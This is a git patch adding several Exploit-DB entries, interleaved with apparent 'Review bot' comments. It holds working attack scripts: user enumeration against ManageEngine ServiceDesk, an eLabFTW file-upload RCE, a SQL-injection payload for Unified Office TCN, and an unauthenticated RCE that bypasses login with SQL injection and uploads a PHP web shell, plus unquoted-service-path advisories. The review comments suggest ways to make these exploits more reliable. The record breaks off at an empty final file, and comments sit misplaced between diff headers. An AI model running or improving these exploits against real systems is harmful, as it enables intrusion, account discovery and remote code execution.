From db4eeaac4176b5ef40657ca74c5d19ddaa0f7238 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 18 Jun 2021 05:01:58 +0000
Subject: [PATCH] DB: 2021-06-18

9 changes to exploits/shellcodes

Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path
Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path
Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path
VX Search 13.5.28 - 'Multiple' Unquoted Service Path
Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
Unified Office Total Connect Now 1.0 - 'data' SQL Injection
Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration
Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
---
 exploits/java/webapps/50027.py | 60 ++++++++++++++++++++++++++++++++
 exploits/php/webapps/46869.py | 59 ++++++++++++-------------
 exploits/php/webapps/50022.txt | 52 +++++++++++++++++++++++++++
 exploits/php/webapps/50029.py | 42 ++++++++++++++++++++++
 exploits/windows/local/50023.txt | 50 ++++++++++++++++++++++++++
 exploits/windows/local/50024.txt | 50 ++++++++++++++++++++++++++
 exploits/windows/local/50025.txt | 50 ++++++++++++++++++++++++++
 exploits/windows/local/50026.txt | 50 ++++++++++++++++++++++++++
 exploits/windows/local/50028.txt | 28 +++++++++++++++
 files_exploits.csv | 8 +++++
 10 files changed, 412 insertions(+), 37 deletions(-)
 create mode 100755 exploits/java/webapps/50027.py
 create mode 100644 exploits/php/webapps/50022.txt
 create mode 100755 exploits/php/webapps/50029.py
 create mode 100644 exploits/windows/local/50023.txt
 create mode 100644 exploits/windows/local/50024.txt
 create mode 100644 exploits/windows/local/50025.txt
 create mode 100644 exploits/windows/local/50026.txt
 create mode 100644 exploits/windows/local/50028.txt

diff --git a/exploits/java/webapps/50027.py b/exploits/java/webapps/50027.py
new file mode 100755
index 000000000..8f63b6e9e
--- /dev/null
+++ b/exploits/java/webapps/50027.py
@@ -0,0 +1,60 @@
+# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration
+# Date: 17/06/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
+# Vendor Homepage: https://www.manageengine.com
+# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
+# Version: Previous to build 10519
+# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
+# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
+# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159
+
+import argparse
+import requests
+import urllib3
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+def get_args():
+ parser = argparse.ArgumentParser()
+ parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
+ parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
+ parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')
+ parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
+ my_args = parser.parse_args()
+ return my_args
+
+
+def main():
+ args = get_args()
+ url = args.target
+ domain = args.domain
+ usersfile = args.usersfile
+ outputfile = args.outputfile
+
+ s = requests.session()
+ s.get(url)
+ resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
+ incorrect_size = len(resp_incorrect.content)
+ print("Incorrect size: %s"%(incorrect_size))
+
+ correct_users = []
+ users = open(usersfile).read().splitlines()
+ for u in users:
+ resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False)
+ valid = (len(resp.content) != incorrect_size)
+ if valid:
+ correct_users.append(u)
+ print("User: %s Response size: 
%s (correct: %s)"%(u, len(resp.content),str(valid)))
+
+ print("\nCorrect users\n")
+ with open(outputfile, 'w') as f:
+ for user in correct_users:
+ f.write("%s\n" % user)
+ print("- %s"%(user))
+
+ print("\nResults stored in %s\n"%(outputfile))
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/46869.py b/exploits/php/webapps/46869.py
index bfbe9a4e7..015dd1df6 100755
--- a/exploits/php/webapps/46869.py
+++ b/exploits/php/webapps/46869.py
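Review bot: The warm-up `s.get(url)` is the only request that keeps certificate verification on, so against a self-signed ServiceDesk instance the script raises SSLError before it reaches the enumeration loop even though every later call passes `verify=False`; make it `s.get(url, verify=False)` as well. Each candidate name is also spliced raw into the query string (`"/ForgotPassword.sd?userName="+u+"&dname="+domain`), so a name containing `&`, `#`, `%` or a space changes the request or produces an unrelated error page that the length oracle then reports as a valid user; `s.get(url+"/ForgotPassword.sd", params={"userName": u, "dname": domain}, verify=False)` lets requests encode it. The oracle compares every response length against one fixed baseline, which presumably only holds if the page does not echo the submitted name back; a comment stating that assumption, plus a `timeout=` on the requests, would help whoever reuses this. Reading the users file without a `with` block is harmless here but worth tidying while touching the loop.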
@@ -1,33 +1,25 @@ -#!/usr/bin/env python -# -# Exploit Title : eLabFTW 1.8.5 'EntityController' Arbitrary -File Upload / RCE +# Exploit Title : eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE # Date : 5/18/19 # Exploit Author : liquidsky (JMcPeters) # Vulnerable Software : eLabFTW 1.8.5 # Vendor Homepage : https://www.elabftw.net/ # Version : 1.8.5 # Software Link : https://github.com/elabftw/elabftw -# Tested On : Linux / PHP Version 7.0.33 / Default -installation (Softaculous) +# Tested On : Linux / PHP Version 7.0.33 / Default installation (Softaculous) # Author Site : http://incidentsecurity.com | https://github.com/fuzzlove # # Greetz : wetw0rk, offsec ^^ # -# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads -via the /app/controllers/EntityController.php component. -# This may result in remote command execution. An attacker can use a -user account to fully compromise the system using a POST request. -# This will allow for PHP files to be written to the web root, and for -code to execute on the remote server. +# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads via the /app/controllers/EntityController.php component. +# This may result in remote command execution. An attacker can use a user account to fully compromise the system using a POST request. +# This will allow for PHP files to be written to the web root, and for code to execute on the remote server. # -# Notes: Once this is done a php shell will drop at https://[target -site]/[elabftw directory]/uploads/[random 2 alphanum]/[random long -alphanumeric].php5?e=whoami -# You will have to visit the uploads directory on the site to see what -the name is. However there is no protection against directory listing. +# Notes: Once this is done a php shell will drop at https://[targetsite]/[elabftw directory]/uploads/[random 2 alphanum]/[random long alphanumeric].php5?e=whoami +# You will have to visit the uploads directory on the site to see what the name is. 
However there is no protection against directory listing. # So this can be done by an attacker remotely. +#!/usr/bin/env python + import requests from bs4 import BeautifulSoup as bs4 requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) @@ -44,20 +36,17 @@ print "+-------------------------------------------------------------+" try: -target = sys.argv[1] -email = sys.argv[2] -password = sys.argv[3] -directory = sys.argv[4] + target = sys.argv[1] + email = sys.argv[2] + password = sys.argv[3] + directory = sys.argv[4] except IndexError: - print -print "- Usage: %s " % sys.argv[0] -print "- Example: %s incidentsecurity.com user@email.com mypassword -elabftw" % sys.argv[0] - print -sys.exit() + print "- Usage: %s " % sys.argv[0] + print "- Example: %s incidentsecurity.com user@email.com mypassword elabftw" % sys.argv[0] + sys.exit() proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} @@ -109,7 +98,7 @@ s = requests.Session() print "[*] Visiting eLabFTW Site" r = s.get('https://' + target + '/' + directory + -'/login.php',verify=False, proxies=proxies) +'/login.php',verify=False) print "[x]" # Grabbing token @@ -126,8 +115,7 @@ time.sleep(2) print "[*] Logging in to eLabFTW" r = s.post('https://' + target + '/' + directory + -'/app/controllers/LoginController.php', data=values, verify=False, -proxies=proxies) +'/app/controllers/LoginController.php', data=values, verify=False) print "[x] Logged in :)" @@ -138,8 +126,7 @@ sessionId = s.cookies['PHPSESSID'] headers = { #POST /elabftw/app/controllers/EntityController.php HTTP/1.1 #Host: incidentsecurity.com - "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) -Gecko/20100101 Firefox/52.0", + "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "application/json", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", 
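Review bot: Moving `#!/usr/bin/env python` below the header comment turns it into an ordinary comment: a shebang is only honoured on the first line of the file, so after this change `./46869.py` no longer launches through the interpreter and must be run as `python 46869.py`. Put it back as line 1, above `# Exploit Title`, or drop it entirely; since the `print "..."` statements in the next hunk are Python 2 syntax, `#!/usr/bin/env python2` would be the more honest interpreter line on systems where `python` resolves to Python 3. The remainder of the hunk only re-joins comment lines that had been hard-wrapped at 72 columns.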
@@ -147,8 +134,7 @@ Gecko/20100101 Firefox/52.0", "Cache-Control": "no-cache", "X-Requested-With": "XMLHttpRequest", "Content-Length": "588", - "Content-Type": "multipart/form-data; -boundary=---------------------------72167598110874594111630395077", + "Content-Type": "multipart/form-data; boundary=---------------------------72167598110874594111630395077", "Connection": "close", "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token } @@ -156,11 +142,10 @@ boundary=---------------------------72167598110874594111630395077", print "[*] Sending payload..." r = s.post('https://' + target + '/' + directory + '/app/controllers/EntityController.php',verify=False, headers=headers, -data=data, proxies=proxies) +data=data) print "[x] Payload sent" print print "Now check https://%s/%s/uploads" % (target, directory) print "Your php shell will be there under a random name (.php5)" print -print "i.e https://[vulnerable -site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami" \ No newline at end of file +print "i.e https://[vulnerable site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami" \ No newline at end of file diff --git a/exploits/php/webapps/50022.txt b/exploits/php/webapps/50022.txt new file mode 100644 index 000000000..0c4a321ff --- /dev/null +++ b/exploits/php/webapps/50022.txt 
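Review bot: With `proxies=proxies` removed from this `s.post` and from the two earlier `s.get`/`s.post` calls, the `proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}` dictionary that survives as context in the `@@ -44,20 +36,17 @@` hunk is now dead code; either delete it or keep the Burp routing behind an opt-in switch such as `proxies = {...} if '--proxy' in sys.argv else None` so the intercept workflow the original author relied on is not silently lost. The hard-coded `"Content-Length": "588"` header a few lines above this hunk presumably matches the fixed multipart body, but it overrides the length requests would compute and will be wrong the moment anyone edits `data`; a one-line comment noting that coupling would save the next user a confusing 400.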
@@ -0,0 +1,52 @@
+# Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection
+# Shodan Filter: http.title:"TCN User Dashboard"
+# Date: 06-16-2021
+# Exploit Author: Ajaikumar Nadar
+# Vendor Homepage: https://unifiedoffice.com/
+# Software Link: https://unifiedoffice.com/voip-business-solutions/
+# Version: 1.0
+# Tested on: CentOS + Apache/2.2.15
+
+POC:
+1. Go to url http://localhost/operator/operatorLogin.php and login
+2. Capture the request in Burpsuite and use the payload as given below.
+3. Observe the response which reveals the DB version of mysql.
+
+Request:
+
+POST /operator/operatorLogin.php HTTP/1.1
+Host: localhost
+Connection: close
+Content-Length: 178
+sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
+Accept: */*
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: https://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: https://localhost/operator/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81
+
+data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"}
+
+
+Response:
+
+HTTP/1.1 400 Bad Request
+Date: Wed, 16 Jun 2021 12:49:56 GMT
+Server: Apache/2.2.15 (CentOS)
+X-Powered-By: PHP/5.3.10
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 139
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'
\ No newline at end of file
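Review bot: The write-up never says whether credentials are needed: the injected `data` body goes to `operatorLogin.php`, the login handler itself, carrying only a bare `PHPSESSID`, so the advisory should state explicitly that this is reachable pre-authentication, and it should name the injectable JSON key (`extension`) since the title only says `'data'`; whether `pin` is injectable as well is not shown. The `floor(rand()*2)` / `group by a` duplicate-key trick is probabilistic and sometimes returns without the `Duplicate entry` error, so a sentence noting that the request may need to be resent would spare readers a false negative. The error text also discloses the absolute path `/var/www/html/recpanel/operator/operatorLogin.php:62` and the MySQL version, which is a separate verbose-error information leak worth recording as a secondary finding, and no CVE, vendor notification or fix status is given.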
diff --git a/exploits/php/webapps/50029.py b/exploits/php/webapps/50029.py
new file mode 100755
index 000000000..dc1583ba5
--- /dev/null
+++ b/exploits/php/webapps/50029.py
@@ -0,0 +1,42 @@
+# Exploit Title: Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)
+# Date: 17.06.2021
+# Exploit Author: Tagoletta (Tağmaç)
+# Software Link: https://phpgurukul.com/shopping-portal-free-download/
+# Version: V3.1
+# Tested on: Windows & Ubuntu
+
+
+import requests
+import random
+import string
+
+
+url = "http://192.168.1.3:80/shopping"
+payload= "'; $cmd = ($_GET['cmd']); system($cmd); echo ''; die; } ?>"
+
+session = requests.session()
+
+print("logining")
+
+request_url = url+"/admin/"
+post_data = {"username": "' OR 1=1-- a", "password": '', "submit": ''}
+session.post(request_url, data=post_data)
+
+let = string.ascii_lowercase
+shellname = ''.join(random.choice(let) for i in range(15))
+randstr = ''.join(random.choice(let) for i in range(15))
+
+print("product name is "+randstr)
+print("shell name is "+shellname)
+print("uploading payload")
+
+request_url = url+"/admin/insert-product.php"
+post_header = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJNYN304wDTnp1QmE", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": url+"/admin/insert-product.php", "Accept-Encoding": "gzip, deflate", "Connection": "close"}
+post_data = "------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n80\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"subcategory\"\r\n\r\n8080\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productName\"\r\n\r\n"+randstr+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productCompany\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; 
name=\"productpricebd\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productprice\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productDescription\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productShippingcharge\"\r\n\r\nTagoletta\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productAvailability\"\r\n\r\nIn Stock\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage1\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage2\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"productimage3\"; filename=\""+shellname+".php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+payload+"\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n------WebKitFormBoundaryJNYN304wDTnp1QmE--\r\n"
+session.post(request_url, headers=post_header, data=post_data)
+
+request_url = url+"/search-result.php"
+post_data = {"product": randstr, "search": ''}
+shellpath = str(requests.post(request_url, data=post_data).content).split("data-echo=\"admin/productimages")[1].split(shellname+".php")[0]
+
+print("\npath of shell= "+url+"/admin/productimages"+shellpath+shellname+".php")
\ No newline at end of file
diff --git a/exploits/windows/local/50023.txt b/exploits/windows/local/50023.txt
new file mode 100644
index 000000000..e4170e4ea
--- /dev/null
+++ b/exploits/windows/local/50023.txt
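Review bot: As it appears in this hunk, the `payload` line begins `'; $cmd = ($_GET['cmd']); ...` and ends `} ?>` with no `<?php` open tag and no `if`/`{` to match that closing brace, which looks like angle-bracket content was stripped somewhere between the author and this page rather than being intentional; verify against the upstream file, because a file written exactly as shown would be served as plain text instead of executed. Neither the login POST nor the `insert-product.php` upload response is inspected, so a failed SQL-injection bypass or a rejected upload surfaces only as an `IndexError` from `.split("data-echo=\"admin/productimages")[1]` on the search page; checking `status_code` on each response and printing an explicit upload-failed message would give a usable error. `str(requests.post(...).content)` goes through the bytes repr (`b'...'`), so `.text` is the right attribute to split, and the target `url = "http://192.168.1.3:80/shopping"` is hard-coded where `sys.argv[1]` would make the script reusable. Sending the same file as `productimage1`, `productimage2` and `productimage3` also leaves three copies of the web shell on the host instead of one.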
@@ -0,0 +1,50 @@
+# Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.syncbreeze.com/
+# Software Links:
+# https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe
+# https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe
+# Tested Version: 13.6.18
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Sync Breeze Server Sync Breeze Server C:\Program Files\Sync Breeze
+Server\bin\syncbrs.exe Auto
+Sync Breeze Enterprise Sync Breeze Enterprise C:\Program Files\Sync
+Breeze Enterprise\bin\syncbrs.exe Auto
+
+C:\Users\IEUser>sc qc "Sync Breeze Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Sync Breeze Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze
+Server\bin\syncbrs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Sync Breeze Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\Users\IEUser>sc qc "Sync Breeze Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Sync Breeze Enterprise
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Sync Breeze
+Enterprise\bin\syncbrs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Sync Breeze Enterprise
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50024.txt b/exploits/windows/local/50024.txt
new file mode 100644
index 000000000..974c1f79d
--- /dev/null
+++ b/exploits/windows/local/50024.txt
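Review bot: The advisory shows the unquoted `C:\Program Files\Sync Breeze Server\bin\syncbrs.exe` path running as `LocalSystem`, but not the part that makes it exploitable: a standard user would have to create `C:\Program.exe`, `C:\Program Files\Sync.exe` or `C:\Program Files\Sync Breeze.exe`, and on a default Windows 10 install neither `C:\` nor `C:\Program Files` grants that. Add the `icacls "C:\Program Files"` and `icacls "C:\Program Files\Sync Breeze Server"` output (and the `Sync Breeze Enterprise` equivalents) so readers can see which directory, if any, is writable, and a note that the planted binary only runs on the next service start (`TIPO_INICIO : 2 AUTO_START`, so a reboot or an administrator restart). The `sc qc` output is from a Spanish locale; a short gloss that `NOMBRE_RUTA_BINARIO` is `BINARY_PATH_NAME` and `NOMBRE_INICIO_SERVICIO` is `SERVICE_START_NAME` would help readers on English systems.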
@@ -0,0 +1,50 @@
+# Exploit Title: Disk Savvy 13.6.14 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.disksavvy.com
+# Software Links:
+# https://www.disksavvy.com/setups_x64/disksavvysrv_setup_v13.6.14_x64.exe
+# https://www.disksavvy.com/setups_x64/disksavvyent_setup_v13.6.14_x64.exe
+# Tested Version: 13.6.14
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Disk Savvy Server Disk Savvy Server C:\Program Files\Disk Savvy
+Server\bin\disksvs.exe Auto
+Disk Savvy Enterprise Disk Savvy Enterprise C:\Program Files\Disk
+Savvy Enterprise\bin\disksvs.exe Auto
+
+C:\>sc qc "Disk Savvy Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Savvy Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy
+Server\bin\disksvs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Savvy Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\>sc qc "Disk Savvy Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Disk Savvy Enterprise
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Disk Savvy
+Enterprise\bin\disksvs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Disk Savvy Enterprise
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50025.txt b/exploits/windows/local/50025.txt
new file mode 100644
index 000000000..c9550f44e
--- /dev/null
+++ b/exploits/windows/local/50025.txt
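Review bot: The write-up stops at showing `C:\Program Files\Disk Savvy Server\bin\disksvs.exe` unquoted under `LocalSystem`; it never demonstrates that a low-privileged user can drop `C:\Program.exe`, `C:\Program Files\Disk.exe` or `C:\Program Files\Disk Savvy.exe`, and on a default Windows 10 install none of those locations is writable by standard users. An `icacls "C:\Program Files\Disk Savvy Server"` / `icacls "C:\Program Files\Disk Savvy Enterprise"` listing, plus a line stating that the hijacked binary is only loaded on the next service start (`TIPO_INICIO : 2 AUTO_START`, i.e. reboot or administrator restart), would turn this from a configuration finding into a demonstrated local privilege escalation.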
@@ -0,0 +1,50 @@
+# Exploit Title: Dup Scout 13.5.28 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.dupscout.com
+# Software Links:
+# https://www.dupscout.com/setups_x64/dupscoutsrv_setup_v13.5.28_x64.exe
+# https://www.dupscout.com/setups_x64/dupscoutent_setup_v13.5.28_x64.exe
+# Tested Version: 13.5.28
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+Dup Scout Server Dup Scout Server C:\Program Files\Dup Scout
+Server\bin\dupscts.exe Auto
+Dup Scout Enterprise Dup Scout Enterprise C:\Program Files\Dup Scout
+Enterprise\bin\dupscts.exe Auto
+
+C:\>sc qc "Dup Scout Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Dup Scout Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout
+Server\bin\dupscts.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Dup Scout Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\>sc qc "Dup Scout Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: Dup Scout Enterprise
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\Dup Scout
+Enterprise\bin\dupscts.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : Dup Scout Enterprise
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50026.txt b/exploits/windows/local/50026.txt
new file mode 100644
index 000000000..a1f542035
--- /dev/null
+++ b/exploits/windows/local/50026.txt
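Review bot: The exploitability claim rests on `C:\Program Files\Dup Scout Server\bin\dupscts.exe` being unquoted and the service running as `LocalSystem`, but the missing ingredient is a writable directory along that path; `C:\Program Files` is administrator-only by default, so unless the installer loosened the ACL on `C:\Program Files\Dup Scout Server` (or `...\Dup Scout Enterprise`) a standard user cannot plant `Dup.exe` or `Dup Scout.exe`. Include the `icacls` output for both directories, and state how the service gets restarted so the search-path hijack actually fires, so that severity can be judged from the advisory alone rather than assumed from the `wmic` output.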
@@ -0,0 +1,50 @@
+# Exploit Title: VX Search 13.5.28 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 16-06-2021
+# Vendor Homepage: https://www.vxsearch.com
+# Software Links:
+# https://www.vxsearch.com/setups_x64/vxsearchsrv_setup_v13.5.28_x64.exe
+# https://www.vxsearch.com/setups_x64/vxsearchent_setup_v13.5.28_x64.exe
+# Tested Version: 13.5.28
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+VX Search Server VX Search Server C:\Program Files\VX Search
+Server\bin\vxsrchs.exe Auto
+VX Search Enterprise VX Search Enterprise C:\Program Files\VX Search
+Enterprise\bin\vxsrchs.exe Auto
+
+C:\>sc qc "VX Search Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: VX Search Server
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search
+Server\bin\vxsrchs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : VX Search Server
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\>sc qc "VX Search Enterprise"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: VX Search Enterprise
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 0 IGNORE
+ NOMBRE_RUTA_BINARIO: C:\Program Files\VX Search
+Enterprise\bin\vxsrchs.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : VX Search Enterprise
+ DEPENDENCIAS :
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/50028.txt b/exploits/windows/local/50028.txt
new file mode 100644
index 000000000..f9c90b2a1
--- /dev/null
+++ b/exploits/windows/local/50028.txt
